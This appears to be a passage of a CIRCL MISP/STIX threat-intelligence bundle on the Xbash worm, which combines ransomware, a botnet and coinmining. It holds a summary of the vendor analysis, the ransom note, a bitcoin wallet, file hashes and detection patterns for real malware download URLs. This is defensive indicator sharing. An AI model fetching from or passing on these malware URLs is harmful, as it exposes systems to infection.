{ "type": "bundle", "id": "bundle--5ba1d01f-27cc-438f-9cbc-4652950d210f", "objects": [ { "type": "identity", "spec_version": "2.1", "id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:36.000Z", "modified": "2018-09-19T05:21:36.000Z", "name": "CIRCL", "identity_class": "organization" }, { "type": "report", "spec_version": "2.1", "id": "report--5ba1d01f-27cc-438f-9cbc-4652950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:36.000Z", "modified": "2018-09-19T05:21:36.000Z", "name": "OSINT (expanded) - Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows", "published": "2018-09-19T05:21:55Z", "object_refs": [ "observed-data--5ba1d038-785c-41d2-8712-4c5d950d210f", "url--5ba1d038-785c-41d2-8712-4c5d950d210f", "x-misp-attribute--5ba1d04d-25a0-455c-9ee7-45f3950d210f", "x-misp-attribute--5ba1d0a7-b470-45ff-ba90-27fb950d210f", "indicator--5ba1d257-f6fc-4740-b3f8-28a2950d210f", "indicator--5ba1d258-c978-467b-acc6-28a2950d210f", "indicator--5ba1d258-9f30-40cc-b608-28a2950d210f", "indicator--5ba1d259-3908-490a-947e-28a2950d210f", "indicator--5ba1d259-08f8-485f-ac9b-28a2950d210f", "indicator--5ba1d259-24bc-4aed-a9c2-28a2950d210f", "indicator--5ba1d25a-0a94-45e3-a624-28a2950d210f", "indicator--5ba1d25a-3294-4259-ba5a-28a2950d210f", "indicator--5ba1d25b-0cd8-42b3-891c-28a2950d210f", "indicator--5ba1d25b-6a28-48a6-9413-28a2950d210f", "indicator--5ba1d299-3438-4286-a1ad-4737950d210f", "indicator--5ba1d29a-7290-41ea-bdb1-4f76950d210f", "indicator--5ba1d29a-b8e8-46d8-b9c5-4381950d210f", "indicator--5ba1d29b-e3c8-48d7-b1a1-4ac9950d210f", "indicator--5ba1d29b-1d08-4090-82a2-47f7950d210f", "indicator--5ba1d4cd-2424-40e7-a047-48a4950d210f", "indicator--5ba1d4cd-aaa0-4f57-93b1-4771950d210f", "indicator--5ba1d4ce-484c-4c15-8ce5-4d5f950d210f", "indicator--5ba1d4ce-5a48-4f70-91c6-4ce9950d210f", "indicator--5ba1d4ce-db6c-4068-8334-4a3b950d210f", 
"indicator--5ba1d4cf-b984-4242-bafc-49d0950d210f", "indicator--5ba1d4cf-0f64-408b-8b8d-42a0950d210f", "indicator--5ba1d4d0-bddc-4521-814d-473c950d210f", "indicator--5ba1d4d0-1d8c-424a-b2d8-4430950d210f", "indicator--5ba1d4d1-1698-491d-a555-4331950d210f", "indicator--5ba1d4d1-2518-4b2f-be8f-46e4950d210f", "indicator--5ba1d4d2-1cd0-4dbb-bb96-444e950d210f", "indicator--5ba1d4d2-98dc-4ef9-a073-4449950d210f", "indicator--5ba1d4d2-39ec-4b98-ae74-42bb950d210f", "indicator--5ba1d4d3-4da0-43c6-a073-4820950d210f", "indicator--5ba1d4f3-0ef4-44cb-8e2e-4fc6950d210f", "indicator--5ba1d4f3-ba24-4602-99bb-43fc950d210f", "indicator--5ba1d4f4-fa84-48bf-a1b9-49b8950d210f", "indicator--5ba1d4f4-9b88-4f01-a225-42c6950d210f", "indicator--5ba1d4f4-47dc-4ee5-a3eb-43e5950d210f", "indicator--5ba1d4f5-3b08-406a-8ad7-42cb950d210f", "indicator--5ba1d4f5-50fc-4482-9ed4-4360950d210f", "indicator--5ba1d4f6-5598-4a65-8dd5-44ff950d210f", "indicator--5ba1d4f6-4230-4c9b-80fe-4167950d210f", "indicator--5ba1d4f7-a7c8-4c70-9fa5-47a1950d210f", "indicator--5ba1d4f7-66f4-4d3f-ae76-40a8950d210f", "indicator--5ba1d508-02d8-44e3-a778-27c3950d210f", "indicator--5ba1d509-5e58-4d73-bd76-27c3950d210f", "indicator--5ba1d51f-5344-4ba2-ae31-4bea950d210f", "indicator--5ba1d51f-d130-4d8f-a046-4e27950d210f", "x-misp-attribute--5ba1d53e-c4bc-4bf0-8245-4a22950d210f", "x-misp-attribute--5ba1d53e-b274-4731-abbb-4920950d210f", "indicator--5ba1d55f-2fcc-49ac-b905-4e51950d210f", "indicator--5ba1d560-0e08-460b-9909-480b950d210f", "indicator--5ba1d560-2538-43e3-8bb2-4d1f950d210f", "x-misp-object--5ba1d5ac-1460-4ba2-9ff1-458e950d210f", "x-misp-object--5ba1d60a-9f28-434d-b03a-4b86950d210f", "x-misp-object--5ba1d673-e378-45e9-9d50-41c6950d210f", "x-misp-object--5ba1d6ce-de54-4d15-8134-27c3950d210f", "indicator--9fb96957-5ea7-449a-bbd2-ff71922b5a6e", "x-misp-object--7c26518e-fa7a-453f-a4cd-e234d2520d3e", "indicator--d33ee6ee-437e-4ce5-ab11-837fee0edc8c", "x-misp-object--6836f38c-a2eb-4f7c-9055-2ffb96e7c45e", 
"indicator--edd4b990-82be-4e5e-858f-50bbd7222f03", "x-misp-object--54646fe4-9b9d-470a-9042-d446a90a15a5", "indicator--33e723b8-2142-46a4-8eae-c311211ea8a0", "x-misp-object--87558dd2-f70c-49b7-b710-6666909e0e91", "indicator--d88b602b-394b-4c46-92fd-b776ed9ef8d9", "x-misp-object--3df3df12-3458-48cc-9031-686fefeaf564", "indicator--93747f03-1eec-47e4-82bc-29b8356a4961", "x-misp-object--59d3e161-919f-486a-bb7b-f4010360c91c", "indicator--a1f90b96-d2ce-46d4-a059-5efedbb57e07", "x-misp-object--7b042050-b92e-404c-87e8-107c8986e1d7", "indicator--45a9a837-c3c8-436c-a546-30547955ba2c", "x-misp-object--6beca7d0-c2fe-4742-b58a-014a7f542862", "indicator--d3df327a-fc5e-422f-a7a1-56849a91787a", "x-misp-object--84cc3152-b806-4ef9-a3c4-e96e0b39f86d", "indicator--14197298-00cc-4d59-85a6-5cf1be917b5c", "x-misp-object--e3c55821-3317-4be2-8eef-60d480f1737e", "indicator--03ebd023-1b57-415f-8a97-f37f6b1095ba", "x-misp-object--8755454f-61de-4423-a149-1d7ba841b7c3", "indicator--0fea2aef-bf8b-40d9-a152-3ef21cef0096", "x-misp-object--c6512ad6-0d9d-4082-abcc-a5fa2c6ed93a", "indicator--faeff86b-7e43-4c04-b688-b6be1f62faaa", "x-misp-object--ebb05fd0-b56c-4384-bde9-b8e540af4c63", "indicator--f092ea7b-05e2-4d29-8196-a214407feb5e", "x-misp-object--0483921b-12e2-450d-97c6-543e513e4a6a", "indicator--9b4f7e14-e26f-4b8e-95a6-a5494c397ad0", "x-misp-object--871efca7-2ad6-4bfe-a116-dcd8cf14fb6a", "relationship--62c44254-dfdd-46a5-8405-b822bd1e8729", "relationship--9d3348b4-1d0b-4747-a234-795e33e1f48d", "relationship--3a5866c4-e62f-456c-822c-e656cef75d59", "relationship--2bb4017d-0fb8-43bb-ad98-dcb648150f8e", "relationship--97dce8d6-48a2-4712-bd1a-378edec44abe", "relationship--dee4280e-6cd1-49c5-ac6b-ac955a20ac7f", "relationship--9d97e294-b4a5-4bdf-8a6d-4776f616c0fc", "relationship--6ca72a98-d5a6-4f61-a834-e223a1ec6196", "relationship--9c8ea731-f63c-430e-a0bc-8211fdd56f51", "relationship--9a77cf06-e5bc-4fa3-b678-1dd099ee5926", "relationship--d20dc510-00b2-4562-862d-af956e2cd62b", 
"relationship--2dd0a986-b772-4b30-b878-9e1e211e7482", "relationship--9cf5bd76-c761-4c60-91e8-15d6ff2b8574", "relationship--6dab5053-03e3-46d0-88a7-7d3e26d63c5a", "relationship--7c1e196f-cc4d-4015-b169-1633c85a3da6" ], "labels": [ "Threat-Report", "misp:tool=\"MISP-STIX-Converter\"", "ms-caro-malware:malware-platform=\"Python\"", "osint:source-type=\"blog-post\"", "misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Exploit Public-Facing Application - T1190\"", "misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Standard Application Layer Protocol - T1071\"", "misp-galaxy:tool=\"Xbash\"", "misp-galaxy:threat-actor=\"Iron Group\"" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5ba1d038-785c-41d2-8712-4c5d950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:10:42.000Z", "modified": "2018-09-19T05:10:42.000Z", "first_observed": "2018-09-19T05:10:42Z", "last_observed": "2018-09-19T05:10:42Z", "number_observed": 1, "object_refs": [ "url--5ba1d038-785c-41d2-8712-4c5d950d210f" ], "labels": [ "misp:type=\"link\"", "misp:category=\"External analysis\"", "osint:source-type=\"blog-post\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--5ba1d038-785c-41d2-8712-4c5d950d210f", "value": "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/" }, { "type": "x-misp-attribute", "spec_version": "2.1", "id": "x-misp-attribute--5ba1d04d-25a0-455c-9ee7-45f3950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:10:43.000Z", "modified": "2018-09-19T05:10:43.000Z", "labels": [ "misp:type=\"text\"", "misp:category=\"External analysis\"", "osint:source-type=\"blog-post\"" ], "x_misp_category": "External analysis", "x_misp_type": "text", "x_misp_value": "Unit 42 researchers have found a new 
malware family that is targeting Linux and Microsoft Windows servers. We can tie this malware, which we have named Xbash, to the Iron Group, a threat actor group known for previous ransomware attacks.\r\n\r\nXbash has ransomware and coinmining capabilities. It also has self-propagating capabilities (meaning it has worm-like characteristics similar to WannaCry or Petya/NotPetya). It also has capabilities not currently implemented that, when implemented, could enable it to spread very quickly within an organization\u2019s network (again, much like WannaCry or Petya/NotPetya).\r\n\r\nXbash spreads by attacking weak passwords and unpatched vulnerabilities.\r\n\r\nXbash is data-destructive; destroying Linux-based databases as part of its ransomware capabilities. We can also find no functionality within Xbash that would enable restoration after the ransom is paid. This means that, similar to NotPetya, Xbash is data destructive malware posing as ransomware.\r\n\r\nOrganizations can protect themselves against Xbash by:\r\n\r\n Using strong, non-default passwords\r\n Keeping up-to-date on security updates\r\n Implementing endpoint security on Microsoft Windows and Linux systems\r\n Preventing access to unknown hosts on the internet (to prevent access to command and control servers)\r\n Implementing and maintaining rigorous and effective backup and restoration processes and procedures.\r\n\r\nPalo Alto Networks customers are protected against Xbash as outlined at the end of this post.\r\n\r\nBelow are some more specifics on Xbash\u2019s capabilities:\r\n\r\n It combines botnet, coinmining, ransomware and self-propagation\r\n It targets Linux-based systems for its ransomware and botnet capabilities\r\n It targets Microsoft Windows-based systems for its coinmining and self-propagating capabilities\r\n The ransomware component targets and deletes Linux-based databases\r\n To date, we have observed 48 incoming transactions to these wallets with total 
income of about 0.964 bitcoins meaning 48 victims have paid about US $6,000 total (at the time of this writing)\r\n However, we see no evidence that the paid ransoms have resulted in recovery for the victims\r\n In fact, we can find no evidence of any functionality that makes recovery possible through ransom payment.\r\n Our analysis shows this is likely the work of the Iron Group, a group publicly linked to other ransomware campaigns including those that use the Remote Control System (RCS), whose source code was believed to be stolen from the HackingTeam in 2015." }, { "type": "x-misp-attribute", "spec_version": "2.1", "id": "x-misp-attribute--5ba1d0a7-b470-45ff-ba90-27fb950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:29:27.000Z", "modified": "2018-09-19T04:29:27.000Z", "labels": [ "misp:type=\"btc\"", "misp:category=\"Financial fraud\"", "misp:to_ids=\"True\"" ], "x_misp_category": "Financial fraud", "x_misp_comment": "If Xbash successfully logs in to a service including MySQL, MongoDB, and PostgreSQL, it will delete almost all existing databases in the server (except for some databases that stored user login information), create a new database named \u201cPLEASE_READ_ME_XYZ\u201d, and insert a ransom message into table \u201cWARNING\u201d of the new database, as shown in Figure 4 and Figure 5. Send 0.02 BTC to this address and contact this email with your website or your ip or db_name of your server to recover your database! 
Your DB is Backed up to our servers!If we not received your payment,we will leak your database 1jqpmcLygJdH8fN7BCk2cwwNBRWqMZqL1 backupsql@pm.me", "x_misp_type": "btc", "x_misp_value": "1jqpmcLygJdH8fN7BCk2cwwNBRWqMZqL1" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d257-f6fc-4740-b3f8-28a2950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:36:39.000Z", "modified": "2018-09-19T04:36:39.000Z", "description": "zlibx", "pattern": "[file:hashes.SHA256 = '7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:36:39Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d258-c978-467b-acc6-28a2950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:36:40.000Z", "modified": "2018-09-19T04:36:40.000Z", "description": "Xbash", "pattern": "[file:hashes.SHA256 = '0b9c54692d25f68ede1de47d4206ec3cd2e5836e368794eccb3daa632334c641']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:36:40Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d258-9f30-40cc-b608-28a2950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:36:40.000Z", "modified": "2018-09-19T04:36:40.000Z", "description": "xapache", "pattern": "[file:hashes.SHA256 = 'dbc380cbfb1536dfb24ef460ce18bccdae549b4585ba713b5228c23924385e54']", "pattern_type": "stix", "pattern_version": "2.1", 
"valid_from": "2018-09-19T04:36:40Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d259-3908-490a-947e-28a2950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:36:41.000Z", "modified": "2018-09-19T04:36:41.000Z", "description": "libhttpd", "pattern": "[file:hashes.SHA256 = '5b790f02bdb26b6b6b270a5669311b4f231d17872aafb237b7e87b6bbb57426d']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:36:41Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d259-08f8-485f-ac9b-28a2950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:36:41.000Z", "modified": "2018-09-19T04:36:41.000Z", "description": "XbashX", "pattern": "[file:hashes.SHA256 = 'e59be6eec9629d376a8a4a70fe9f8f3eec7b0919019f819d44b9bdd1c429277c']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:36:41Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d259-24bc-4aed-a9c2-28a2950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:36:41.000Z", "modified": "2018-09-19T04:36:41.000Z", "description": "XbashY", "pattern": "[file:hashes.SHA256 = 'f808a42b10cf55603389945a549ce45edc6a04562196d14f7489af04688f12bc']", "pattern_type": "stix", "pattern_version": 
"2.1", "valid_from": "2018-09-19T04:36:41Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d25a-0a94-45e3-a624-28a2950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:36:42.000Z", "modified": "2018-09-19T04:36:42.000Z", "description": "rootv2.sh", "pattern": "[file:hashes.SHA256 = 'dcd37e5b266cc0cd3fab73caa63b218f5b92e9bd5b25cf1cacf1afdb0d8e76ff']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:36:42Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d25a-3294-4259-ba5a-28a2950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:36:42.000Z", "modified": "2018-09-19T04:36:42.000Z", "description": "owerv2.sh", "pattern": "[file:hashes.SHA256 = 'de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:36:42Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d25b-0cd8-42b3-891c-28a2950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:36:43.000Z", "modified": "2018-09-19T04:36:43.000Z", "description": "rootv2.sh", "pattern": "[file:hashes.SHA256 = '09968c4573580398b3269577ced28090eae4a7c326c1a0ec546761c623625885']", "pattern_type": "stix", 
"pattern_version": "2.1", "valid_from": "2018-09-19T04:36:43Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d25b-6a28-48a6-9413-28a2950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:36:43.000Z", "modified": "2018-09-19T04:36:43.000Z", "description": "r88.sh", "pattern": "[file:hashes.SHA256 = 'a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:36:43Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d299-3438-4286-a1ad-4737950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:37:45.000Z", "modified": "2018-09-19T04:37:45.000Z", "description": "tt.txt", "pattern": "[file:hashes.SHA256 = 'f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:37:45Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d29a-7290-41ea-bdb1-4f76950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:37:46.000Z", "modified": "2018-09-19T04:37:46.000Z", "description": "tg.jpg", "pattern": "[file:hashes.SHA256 = '31155bf8c85c6c6193842b8d09bda88990d710db9f70efe85c421f1484f0ee78']", "pattern_type": 
"stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:37:46Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d29a-b8e8-46d8-b9c5-4381950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:37:46.000Z", "modified": "2018-09-19T04:37:46.000Z", "description": "reg9.sct", "pattern": "[file:hashes.SHA256 = '725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:37:46Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d29b-e3c8-48d7-b1a1-4ac9950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:37:47.000Z", "modified": "2018-09-19T04:37:47.000Z", "description": "m.png", "pattern": "[file:hashes.SHA256 = 'd7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:37:47Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d29b-1d08-4090-82a2-47f7950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:37:47.000Z", "modified": "2018-09-19T04:37:47.000Z", "description": "tmp.jpg", "pattern": "[file:hashes.SHA256 = 'ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50']", 
"pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:37:47Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4cd-2424-40e7-a047-48a4950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:09.000Z", "modified": "2018-09-19T04:47:09.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://3g2upl4pq6kufc4m.tk/zlibx']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:09Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4cd-aaa0-4f57-93b1-4771950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:09.000Z", "modified": "2018-09-19T04:47:09.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://e3sas6tzvehwgpak.tk/XbashY']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:09Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4ce-484c-4c15-8ce5-4d5f950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:10.000Z", "modified": "2018-09-19T04:47:10.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://3g2upl4pq6kufc4m.tk/XbashY']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:10Z", 
"kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4ce-5a48-4f70-91c6-4ce9950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:10.000Z", "modified": "2018-09-19T04:47:10.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://3g2upl4pq6kufc4m.tk/xapache']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:10Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4ce-db6c-4068-8334-4a3b950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:10.000Z", "modified": "2018-09-19T04:47:10.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://3g2upl4pq6kufc4m.tk/libhttpd']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:10Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4cf-b984-4242-bafc-49d0950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:11.000Z", "modified": "2018-09-19T04:47:11.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://xmr.enjoytopic.tk/l/rootv2.sh']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:11Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network 
activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4cf-0f64-408b-8b8d-42a0950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:11.000Z", "modified": "2018-09-19T04:47:11.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://xmr.enjoytopic.tk/l2/rootv2.sh']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:11Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4d0-bddc-4521-814d-473c950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:12.000Z", "modified": "2018-09-19T04:47:12.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://xmr.enjoytopic.tk/l/r88.sh']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:12Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4d0-1d8c-424a-b2d8-4430950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:12.000Z", "modified": "2018-09-19T04:47:12.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://xmr.enjoytopic.tk/12/r88.sh']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:12Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", 
"misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4d1-1698-491d-a555-4331950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:13.000Z", "modified": "2018-09-19T04:47:13.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://e3sas6tzvehwgpak.tk/lowerv2.sh']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:13Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4d1-2518-4b2f-be8f-46e4950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:13.000Z", "modified": "2018-09-19T04:47:13.000Z", "description": "Downloading 